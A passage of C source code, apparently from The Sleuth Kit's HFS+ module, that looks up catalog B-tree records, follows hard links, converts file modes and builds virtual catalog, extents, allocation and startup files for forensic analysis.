HFS_CAT_GET_RECORD_OFFSET_DATA *offset_data = (HFS_CAT_GET_RECORD_OFFSET_DATA *)ptr;
const hfs_btree_key_cat *targ_key = offset_data->targ_key;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_get_record_offset_cb: %s node want: %" PRIu32
" vs have: %" PRIu32 "\n",
(level_type == HFS_BT_NODE_TYPE_IDX) ? "Index" : "Leaf",
tsk_getu32(hfs->fs_info.endian, targ_key->parent_cnid),
tsk_getu32(hfs->fs_info.endian, cur_key->parent_cnid));
if (level_type == HFS_BT_NODE_TYPE_IDX) {
int diff = hfs_cat_compare_keys(hfs, cur_key, targ_key);
if (diff < 0)
return HFS_BTREE_CB_IDX_LT;
else
return HFS_BTREE_CB_IDX_EQGT;
}
else {
int diff = hfs_cat_compare_keys(hfs, cur_key, targ_key);
// see if this record is for our file or if we passed the interesting entries
if (diff < 0) {
return HFS_BTREE_CB_LEAF_GO;
}
else if (diff == 0) {
offset_data->off =
key_off + 2 + tsk_getu16(hfs->fs_info.endian,
cur_key->key_len);
}
return HFS_BTREE_CB_LEAF_STOP;
}
}
/** \internal
* Find the byte offset (from the start of the catalog file) to a record
* in the catalog file.
* @param hfs File System being analyzed
* @param needle Key to search for
* @returns Byte offset or 0 on error. 0 is also returned if catalog
* record was not found. Check tsk_errno to determine if error occurred.
*/
static TSK_OFF_T
hfs_cat_get_record_offset(HFS_INFO * hfs, const hfs_btree_key_cat * needle)
{
HFS_CAT_GET_RECORD_OFFSET_DATA offset_data;
offset_data.off = 0;
offset_data.targ_key = needle;
if (hfs_cat_traverse(hfs, hfs_cat_get_record_offset_cb, &offset_data)) {
return 0;
}
return offset_data.off;
}
/** \internal
* Given a byte offset to a leaf record in teh catalog file, read the data as
* a thread record. This will zero the buffer and read in the size of the thread
* data.
* @param hfs File System
* @param off Byte offset of record in catalog file (not including key)
* @param thread [out] Buffer to write thread data into.
* @returns 0 on success, 1 on failure; sets up to error string 1 */
uint8_t
hfs_cat_read_thread_record(HFS_INFO * hfs, TSK_OFF_T off,
hfs_thread * thread)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
uint16_t uni_len;
ssize_t cnt;
memset(thread, 0, sizeof(hfs_thread));
cnt = tsk_fs_attr_read(hfs->catalog_attr, off, (char *) thread, 10, 0);
if (cnt != 10) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_read_thread_record: Error reading catalog offset %"
PRIuOFF " (header)", off);
return 1;
}
if ((tsk_getu16(fs->endian, thread->rec_type) != HFS_FOLDER_THREAD)
&& (tsk_getu16(fs->endian, thread->rec_type) != HFS_FILE_THREAD)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_read_thread_record: unexpected record type %" PRIu16,
tsk_getu16(fs->endian, thread->rec_type));
return 1;
}
uni_len = tsk_getu16(fs->endian, thread->name.length);
if (uni_len > 255) {
tsk_error_set_errno(TSK_ERR_FS_INODE_COR);
tsk_error_set_errstr
("hfs_cat_read_thread_record: invalid string length (%" PRIu16
")", uni_len);
return 1;
}
cnt =
tsk_fs_attr_read(hfs->catalog_attr, off + 10,
(char *) thread->name.unicode, uni_len * 2, 0);
if (cnt != uni_len * 2) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_read_thread_record: Error reading catalog offset %"
PRIuOFF " (name)", off + 10);
return 1;
}
return 0;
}
/** \internal
* Read a catalog record into a local data structure. This reads the
* correct amount, depending on if it is a file or folder.
* @param hfs File system being analyzed
* @param off Byte offset (in catalog file) of record (not including key)
* @param record [out] Structure to read data into
* @returns 1 on error
*/
uint8_t
hfs_cat_read_file_folder_record(HFS_INFO * hfs, TSK_OFF_T off,
hfs_file_folder * record)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
ssize_t cnt;
char rec_type[2];
memset(record, 0, sizeof(hfs_file_folder));
cnt = tsk_fs_attr_read(hfs->catalog_attr, off, rec_type, 2, 0);
if (cnt != 2) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_read_file_folder_record: Error reading record type from catalog offset %"
PRIuOFF " (header)", off);
return 1;
}
if (tsk_getu16(fs->endian, rec_type) == HFS_FOLDER_RECORD) {
cnt =
tsk_fs_attr_read(hfs->catalog_attr, off, (char *) record,
sizeof(hfs_folder), 0);
if (cnt != sizeof(hfs_folder)) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_read_file_folder_record: Error reading catalog offset %"
PRIuOFF " (folder)", off);
return 1;
}
}
else if (tsk_getu16(fs->endian, rec_type) == HFS_FILE_RECORD) {
cnt =
tsk_fs_attr_read(hfs->catalog_attr, off, (char *) record,
sizeof(hfs_file), 0);
if (cnt != sizeof(hfs_file)) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_read_file_folder_record: Error reading catalog offset %"
PRIuOFF " (file)", off);
return 1;
}
}
else {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_read_file_folder_record: unexpected record type %"
PRIu16, tsk_getu16(fs->endian, rec_type));
return 1;
}
return 0;
}
// hfs_lookup_hard_link appears to be unnecessary - it looks up the cnid
// by seeing if there's a file/dir with the standard hard link name plus
// linknum and returns the meta_addr. But this should always be the same as linknum,
// and is very slow when there are many hard links, so it shouldn't be used.
//static TSK_INUM_T
//hfs_lookup_hard_link(HFS_INFO * hfs, TSK_INUM_T linknum,
// unsigned char is_directory)
//{
// char fBuff[30];
// TSK_FS_DIR *mdir;
// size_t indx;
// TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
//
// memset(fBuff, 0, 30);
//
// if (is_directory) {
//
// tsk_take_lock(&(hfs->metadata_dir_cache_lock));
// if (hfs->dir_meta_dir == NULL) {
// hfs->dir_meta_dir =
// tsk_fs_dir_open_meta(fs, hfs->meta_dir_inum);
// }
// tsk_release_lock(&(hfs->metadata_dir_cache_lock));
//
// if (hfs->dir_meta_dir == NULL) {
// error_returned
// ("hfs_lookup_hard_link: could not open the dir metadata directory");
// return 0;
// }
// else {
// mdir = hfs->dir_meta_dir;
// }
// snprintf(fBuff, 30, "dir_%" PRIuINUM, linknum);
//
// }
// else {
//
// tsk_take_lock(&(hfs->metadata_dir_cache_lock));
// if (hfs->meta_dir == NULL) {
// hfs->meta_dir = tsk_fs_dir_open_meta(fs, hfs->meta_inum);
// }
// tsk_release_lock(&(hfs->metadata_dir_cache_lock));
//
// if (hfs->meta_dir == NULL) {
// error_returned
// ("hfs_lookup_hard_link: could not open file metadata directory");
// return 0;
// }
// else {
// mdir = hfs->meta_dir;
// }
// snprintf(fBuff, 30, "iNode%" PRIuINUM, linknum);
// }
//
// for (indx = 0; indx < tsk_fs_dir_getsize(mdir); ++indx) {
// if ((mdir->names != NULL) && mdir->names[indx].name &&
// (fs->name_cmp(fs, mdir->names[indx].name, fBuff) == 0)) {
// // OK this is the one
// return mdir->names[indx].meta_addr;
// }
// }
//
// // OK, we did not find that linknum
// return 0;
//}
/*
* Given a catalog entry, will test that entry to see if it is a hard link.
* If it is a hard link, the function returns the inum (or cnid) of the target file.
* If it is NOT a hard link, then then function returns the inum of the given entry.
* In both cases, the parameter is_error is set to zero.
*
* If an ERROR occurs, if it is a mild error, then is_error is set to 1, and the
* inum of the given entry is returned. This signals that hard link detection cannot
* be carried out.
*
* If the error is serious, then is_error is set to 2 or 3, depending on the kind of error, and
* the TSK error code is set, and the function returns zero. is_error==2 means that an error
* occurred in looking up the target file in the Catalog. is_error==3 means that the given
* entry appears to be a hard link, but the target file does not exist in the Catalog.
*
* @param hfs The file system
* @param entry The catalog entry to check
* @param is_error A Boolean that is returned indicating an error, or no error.\
* @return The inum (or cnid) of the hard link target, or of the given catalog entry, or zero.
*/
TSK_INUM_T
hfs_follow_hard_link(HFS_INFO * hfs, hfs_file * cat,
unsigned char *is_error)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_INUM_T cnid;
time_t crtime;
uint32_t file_type;
uint32_t file_creator;
*is_error = 0; // default, not an error
if (cat == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_follow_hard_link: Pointer to Catalog entry (2nd arg) is null");
return 0;
}
cnid = tsk_getu32(fs->endian, cat->std.cnid);
if (cnid < HFS_FIRST_USER_CNID) {
// Can't be a hard link. And, cannot look up in Catalog file either!
return cnid;
}
crtime =
(time_t) hfs_convert_2_unix_time(tsk_getu32(fs->endian,
cat->std.crtime));
file_type = tsk_getu32(fs->endian, cat->std.u_info.file_type);
file_creator = tsk_getu32(fs->endian, cat->std.u_info.file_cr);
// Only proceed with the rest of this if the flags etc are right
if (file_type == HFS_HARDLINK_FILE_TYPE
&& file_creator == HFS_HARDLINK_FILE_CREATOR) {
// see if we have the HFS+ Private Data dir for file links;
// if not, it can't be a hard link. (We could warn the user, but
// we also rely on this when finding the HFS+ Private Data dir in
// the first place and we don't want a warning on every hfs_open.)
if (hfs->meta_inum == 0)
return cnid;
// For this to work, we need the FS creation times. Is at least one of these set?
if ((!hfs->has_root_crtime) && (!hfs->has_meta_dir_crtime)
&& (!hfs->has_meta_crtime)) {
uint32_t linkNum =
tsk_getu32(fs->endian, cat->std.perm.special.inum);
*is_error = 1;
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: hfs_follow_hard_link: File system creation times are not set. "
"Cannot test inode for hard link. File type and creator indicate that this"
" is a hard link (file), with LINK ID = %" PRIu32 "\n",
linkNum);
return cnid;
}
if ((!hfs->has_root_crtime) || (!hfs->has_meta_crtime)) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: hfs_follow_hard_link: Either the root folder or the"
" file metadata folder is not accessible. Testing this potential hard link"
" may be impaired.\n");
}
// Now we need to check the creation time against the three FS creation times
if ((hfs->has_meta_crtime && (crtime == hfs->meta_crtime)) ||
(hfs->has_meta_dir_crtime && (crtime == hfs->metadir_crtime))
|| (hfs->has_root_crtime && (crtime == hfs->root_crtime))) {
// OK, this is a hard link to a file.
uint32_t linkNum =
tsk_getu32(fs->endian, cat->std.perm.special.inum);
// We used to resolve this ID to a file in X folder using hfs_lookup_hard_link, but found
// that it was very ineffecient and always resulted in the same linkNum value.
// We now just use linkNum
return linkNum;
}
}
else if (file_type == HFS_LINKDIR_FILE_TYPE
&& file_creator == HFS_LINKDIR_FILE_CREATOR) {
// see if we have the HFS+ Private Directory Data dir for links;
// if not, it can't be a hard link. (We could warn the user, but
// we also rely on this when finding the HFS+ Private Directory Data dir in
// the first place and we don't want a warning on every hfs_open.)
if (hfs->meta_dir_inum == 0)
return cnid;
// For this to work, we need the FS creation times. Is at least one of these set?
if ((!hfs->has_root_crtime) && (!hfs->has_meta_dir_crtime)
&& (!hfs->has_meta_crtime)) {
uint32_t linkNum =
tsk_getu32(fs->endian, cat->std.perm.special.inum);
*is_error = 1;
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: hfs_follow_hard_link: File system creation times are not set. "
"Cannot test inode for hard link. File type and creator indicate that this"
" is a hard link (directory), with LINK ID = %" PRIu32
"\n", linkNum);
return cnid;
}
if ((!hfs->has_root_crtime) || (!hfs->has_meta_crtime)
|| (!hfs->has_meta_dir_crtime)) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: hfs_follow_hard_link: Either the root folder or the"
" file metadata folder or the directory metatdata folder is"
" not accessible. Testing this potential hard linked folder "
"may be impaired.\n");
}
// Now we need to check the creation time against the three FS creation times
if ((hfs->has_meta_crtime && (crtime == hfs->meta_crtime)) ||
(hfs->has_meta_dir_crtime && (crtime == hfs->metadir_crtime))
|| (hfs->has_root_crtime && (crtime == hfs->root_crtime))) {
// OK, this is a hard link to a directory.
uint32_t linkNum =
tsk_getu32(fs->endian, cat->std.perm.special.inum);
// We used to resolve this ID to a file in X folder using hfs_lookup_hard_link, but found
// that it was very ineffecient and always resulted in the same linkNum value.
// We now just use linkNum
return linkNum;
}
}
// It cannot be a hard link (file or directory)
return cnid;
}
/** \internal
* Lookup an entry in the catalog file and save it into the entry. Do not
* call this for the special files that do not have an entry in the catalog.
* data structure.
* @param hfs File system being analyzed
* @param inum Address (cnid) of file to open
* @param entry [out] Structure to read data into
* @returns 1 on error or not found, 0 on success. Check tsk_errno
* to differentiate between error and not found. If it is not found, then the
* errno will be TSK_ERR_FS_INODE_NUM. Else, it will be some other value.
*/
uint8_t
hfs_cat_file_lookup(HFS_INFO * hfs, TSK_INUM_T inum, HFS_ENTRY * entry,
unsigned char follow_hard_link)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
hfs_btree_key_cat key; /* current catalog key */
hfs_thread thread; /* thread record */
hfs_file_folder record; /* file/folder record */
TSK_OFF_T off;
tsk_error_reset();
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_file_lookup: called for inum %" PRIuINUM "\n", inum);
// Test if this is a special file that is not located in the catalog
if ((inum == HFS_EXTENTS_FILE_ID) ||
(inum == HFS_CATALOG_FILE_ID) ||
(inum == HFS_ALLOCATION_FILE_ID) ||
(inum == HFS_STARTUP_FILE_ID) ||
(inum == HFS_ATTRIBUTES_FILE_ID)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_file_lookup: Called on special file: %" PRIuINUM,
inum);
return 1;
}
/* first look up the thread record for the item we're searching for */
/* set up the thread record key */
memset((char *) &key, 0, sizeof(hfs_btree_key_cat));
cnid_to_array((uint32_t) inum, key.parent_cnid);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_file_lookup: Looking up thread record (%" PRIuINUM
")\n", inum);
/* look up the thread record */
off = hfs_cat_get_record_offset(hfs, &key);
if (off == 0) {
// no parsing error, just not found
if (tsk_error_get_errno() == 0) {
tsk_error_set_errno(TSK_ERR_FS_INODE_NUM);
tsk_error_set_errstr
("hfs_cat_file_lookup: Error finding thread node for file (%"
PRIuINUM ")", inum);
}
else {
tsk_error_set_errstr2
(" hfs_cat_file_lookup: thread for file (%" PRIuINUM ")",
inum);
}
return 1;
}
/* read the thread record */
if (hfs_cat_read_thread_record(hfs, off, &thread)) {
tsk_error_set_errstr2(" hfs_cat_file_lookup: file (%" PRIuINUM ")",
inum);
return 1;
}
/* now look up the actual file/folder record */
/* build key */
memset((char *) &key, 0, sizeof(hfs_btree_key_cat));
memcpy((char *) key.parent_cnid, (char *) thread.parent_cnid,
sizeof(key.parent_cnid));
memcpy((char *) &key.name, (char *) &thread.name, sizeof(key.name));
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_file_lookup: Looking up file record (parent: %"
PRIuINUM ")\n", (uint64_t) tsk_getu32(fs->endian,
key.parent_cnid));
/* look up the record */
off = hfs_cat_get_record_offset(hfs, &key);
if (off == 0) {
// no parsing error, just not found
if (tsk_error_get_errno() == 0) {
tsk_error_set_errno(TSK_ERR_FS_INODE_NUM);
tsk_error_set_errstr
("hfs_cat_file_lookup: Error finding record node %"
PRIuINUM, inum);
}
else {
tsk_error_set_errstr2(" hfs_cat_file_lookup: file (%" PRIuINUM
")", inum);
}
return 1;
}
/* read the record */
if (hfs_cat_read_file_folder_record(hfs, off, &record)) {
tsk_error_set_errstr2(" hfs_cat_file_lookup: file (%" PRIuINUM ")",
inum);
return 1;
}
/* these memcpy can be gotten rid of, really */
if (tsk_getu16(fs->endian,
record.file.std.rec_type) == HFS_FOLDER_RECORD) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_file_lookup: found folder record valence %" PRIu32
", cnid %" PRIu32 "\n", tsk_getu32(fs->endian,
record.folder.std.valence), tsk_getu32(fs->endian,
record.folder.std.cnid));
memcpy((char *) &entry->cat, (char *) &record, sizeof(hfs_folder));
}
else if (tsk_getu16(fs->endian,
record.file.std.rec_type) == HFS_FILE_RECORD) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_file_lookup: found file record cnid %" PRIu32
"\n", tsk_getu32(fs->endian, record.file.std.cnid));
memcpy((char *) &entry->cat, (char *) &record, sizeof(hfs_file));
}
/* other cases already caught by hfs_cat_read_file_folder_record */
memcpy((char *) &entry->thread, (char *) &thread, sizeof(hfs_thread));
entry->flags = TSK_FS_META_FLAG_ALLOC | TSK_FS_META_FLAG_USED;
entry->inum = inum;
if (follow_hard_link) {
// TEST to see if this is a hard link
unsigned char is_err;
TSK_INUM_T target_cnid =
hfs_follow_hard_link(hfs, &(entry->cat), &is_err);
if (is_err > 1) {
error_returned
("hfs_cat_file_lookup: error occurred while following a possible hard link for "
"inum (cnid) = %" PRIuINUM, inum);
return 1;
}
if (target_cnid != inum) {
// This is a hard link, and we have got the cnid of the target file, so look it up.
uint8_t res =
hfs_cat_file_lookup(hfs, target_cnid, entry, FALSE);
if (res != 0) {
error_returned
("hfs_cat_file_lookup: error occurred while looking up the Catalog entry for "
"the target of inum (cnid) = %" PRIuINUM " target",
inum);
}
return 1;
}
// Target is NOT a hard link, so fall through to the non-hard link exit.
}
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_cat_file_lookup exiting\n");
return 0;
}
static uint8_t
hfs_find_highest_inum_cb(HFS_INFO * hfs, int8_t level_type,
const hfs_btree_key_cat * cur_key,
TSK_OFF_T key_off, void *ptr)
{
// NOTE: This assumes that the biggest inum is the last one that we
// see. the traverse method does not currently promise that as part of
// its callback "contract".
*((TSK_INUM_T*) ptr) = tsk_getu32(hfs->fs_info.endian, cur_key->parent_cnid);
return HFS_BTREE_CB_IDX_LT;
}
/** \internal
* Returns the largest inode number in file system
* @param hfs File system being analyzed
* @returns largest metadata address
*/
static TSK_INUM_T
hfs_find_highest_inum(HFS_INFO * hfs)
{
// @@@ get actual number from Catalog file (go to far right) (we can't always trust the vol header)
TSK_INUM_T inum;
if (hfs_cat_traverse(hfs, hfs_find_highest_inum_cb, &inum)) {
/* Catalog traversal failed, fallback on legacy method :
if HFS_VH_ATTR_CNIDS_REUSED is set, then
the maximum CNID is 2^32-1; if it's not set, then nextCatalogId is
supposed to be larger than all CNIDs on disk.
*/
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
if (tsk_getu32(fs->endian, hfs->fs->attr) & HFS_VH_ATTR_CNIDS_REUSED)
return (TSK_INUM_T) 0xffffffff;
else
return (TSK_INUM_T) tsk_getu32(fs->endian,
hfs->fs->next_cat_id) - 1;
}
return inum;
}
static TSK_FS_META_MODE_ENUM
hfs_mode_to_tsk_mode(uint16_t a_mode)
{
TSK_FS_META_MODE_ENUM mode = 0;
if (a_mode & HFS_IN_ISUID)
mode |= TSK_FS_META_MODE_ISUID;
if (a_mode & HFS_IN_ISGID)
mode |= TSK_FS_META_MODE_ISGID;
if (a_mode & HFS_IN_ISVTX)
mode |= TSK_FS_META_MODE_ISVTX;
if (a_mode & HFS_IN_IRUSR)
mode |= TSK_FS_META_MODE_IRUSR;
if (a_mode & HFS_IN_IWUSR)
mode |= TSK_FS_META_MODE_IWUSR;
if (a_mode & HFS_IN_IXUSR)
mode |= TSK_FS_META_MODE_IXUSR;
if (a_mode & HFS_IN_IRGRP)
mode |= TSK_FS_META_MODE_IRGRP;
if (a_mode & HFS_IN_IWGRP)
mode |= TSK_FS_META_MODE_IWGRP;
if (a_mode & HFS_IN_IXGRP)
mode |= TSK_FS_META_MODE_IXGRP;
if (a_mode & HFS_IN_IROTH)
mode |= TSK_FS_META_MODE_IROTH;
if (a_mode & HFS_IN_IWOTH)
mode |= TSK_FS_META_MODE_IWOTH;
if (a_mode & HFS_IN_IXOTH)
mode |= TSK_FS_META_MODE_IXOTH;
return mode;
}
static TSK_FS_META_TYPE_ENUM
hfs_mode_to_tsk_meta_type(uint16_t a_mode)
{
switch (a_mode & HFS_IN_IFMT) {
case HFS_IN_IFIFO:
return TSK_FS_META_TYPE_FIFO;
case HFS_IN_IFCHR:
return TSK_FS_META_TYPE_CHR;
case HFS_IN_IFDIR:
return TSK_FS_META_TYPE_DIR;
case HFS_IN_IFBLK:
return TSK_FS_META_TYPE_BLK;
case HFS_IN_IFREG:
return TSK_FS_META_TYPE_REG;
case HFS_IN_IFLNK:
return TSK_FS_META_TYPE_LNK;
case HFS_IN_IFSOCK:
return TSK_FS_META_TYPE_SOCK;
case HFS_IFWHT:
return TSK_FS_META_TYPE_WHT;
case HFS_IFXATTR:
return TSK_FS_META_TYPE_UNDEF;
default:
/* error */
return TSK_FS_META_TYPE_UNDEF;
}
}
static uint8_t
hfs_make_specialbase(TSK_FS_FILE * fs_file)
{
fs_file->meta->type = TSK_FS_META_TYPE_REG;
fs_file->meta->mode = 0;
fs_file->meta->nlink = 1;
fs_file->meta->flags =
(TSK_FS_META_FLAG_USED | TSK_FS_META_FLAG_ALLOC);
fs_file->meta->uid = fs_file->meta->gid = 0;
fs_file->meta->mtime = fs_file->meta->atime = fs_file->meta->ctime =
fs_file->meta->crtime = 0;
fs_file->meta->mtime_nano = fs_file->meta->atime_nano =
fs_file->meta->ctime_nano = fs_file->meta->crtime_nano = 0;
if (fs_file->meta->name2 == NULL) {
if ((fs_file->meta->name2 = (TSK_FS_META_NAME_LIST *)
tsk_malloc(sizeof(TSK_FS_META_NAME_LIST))) == NULL) {
error_returned
(" - hfs_make_specialbase, couldn't malloc space for a name list");
return 1;
}
fs_file->meta->name2->next = NULL;
}
if (fs_file->meta->attr != NULL) {
tsk_fs_attrlist_markunused(fs_file->meta->attr);
}
else {
fs_file->meta->attr = tsk_fs_attrlist_alloc();
}
return 0;
}
/**
* \internal
* Create an FS_INODE structure for the catalog file.
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_catalog(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
unsigned char dummy1, dummy2;
uint64_t dummy3;
uint8_t result;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_catalog: Making virtual catalog file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_catalog");
return 1;
}
fs_file->meta->addr = HFS_CATALOG_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_CATALOGNAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size =
tsk_getu64(fs->endian, hfs->fs->cat_file.logic_sz);
// convert the runs in the volume header to attribute runs
if (((attr_run =
hfs_extents_to_attr(fs, hfs->fs->cat_file.extents,
0)) == NULL) && (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_make_catalog");
return 1;
}
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_make_catalog");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// initialize the data run
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
tsk_getu64(fs->endian, hfs->fs->cat_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->cat_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->cat_file.logic_sz), 0, 0)) {
error_returned(" - hfs_make_catalog");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if catalog file has additional runs
if (hfs_ext_find_extent_record_attr(hfs, HFS_CATALOG_FILE_ID, fs_attr,
TRUE)) {
error_returned(" - hfs_make_catalog");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
result = hfs_load_extended_attrs(fs_file, &dummy1, &dummy2, &dummy3);
if (result != 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: Extended attributes failed to load for the Catalog file.\n");
tsk_error_reset();
}
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/**
* \internal
* Create an FS_FILE for the extents file
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_extents(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_extents: Making virtual extents file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_extents");
return 1;
}
fs_file->meta->addr = HFS_EXTENTS_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_EXTENTSNAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size =
tsk_getu64(fs->endian, hfs->fs->ext_file.logic_sz);
if (((attr_run =
hfs_extents_to_attr(fs, hfs->fs->ext_file.extents,
0)) == NULL) && (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_make_extents");
return 1;
}
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_make_extents");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// initialize the data run
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
tsk_getu64(fs->endian, hfs->fs->ext_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->ext_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->ext_file.logic_sz), 0, 0)) {
error_returned(" - hfs_make_extents");
tsk_fs_attr_run_free(attr_run);
return 1;
}
//hfs_load_extended_attrs(fs_file);
// Extents doesn't have an entry in itself
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/**
* \internal
* Create an FS_INODE structure for the blockmap / allocation file.
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_blockmap(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
unsigned char dummy1, dummy2;
uint64_t dummy3;
uint8_t result;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_blockmap: Making virtual blockmap file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_blockmap");
return 1;
}
fs_file->meta->addr = HFS_ALLOCATION_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_ALLOCATIONNAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size =
tsk_getu64(fs->endian, hfs->fs->alloc_file.logic_sz);
if (((attr_run =
hfs_extents_to_attr(fs, hfs->fs->alloc_file.extents,
0)) == NULL) && (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_make_blockmap");
return 1;
}
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_make_blockmap");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// initialize the data run
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
tsk_getu64(fs->endian, hfs->fs->alloc_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->alloc_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->alloc_file.logic_sz), 0, 0)) {
error_returned(" - hfs_make_blockmap");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if catalog file has additional runs
if (hfs_ext_find_extent_record_attr(hfs, HFS_ALLOCATION_FILE_ID,
fs_attr, TRUE)) {
error_returned(" - hfs_make_blockmap");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
result = hfs_load_extended_attrs(fs_file, &dummy1, &dummy2, &dummy3);
if (result != 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: Extended attributes failed to load for the Allocation file.\n");
tsk_error_reset();
}
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/**
* \internal
* Create an FS_INODE structure for the startup / boot file.
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_startfile(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
unsigned char dummy1, dummy2;
uint64_t dummy3;
uint8_t result;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_startfile: Making virtual startup file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_startfile");
return 1;
}
fs_file->meta->addr = HFS_STARTUP_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_STARTUPNAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size =
tsk_getu64(fs->endian, hfs->fs->start_file.logic_sz);
if (((attr_run =
hfs_extents_to_attr(fs, hfs->fs->start_file.extents,
0)) == NULL) && (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_make_startfile");
return 1;
}
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
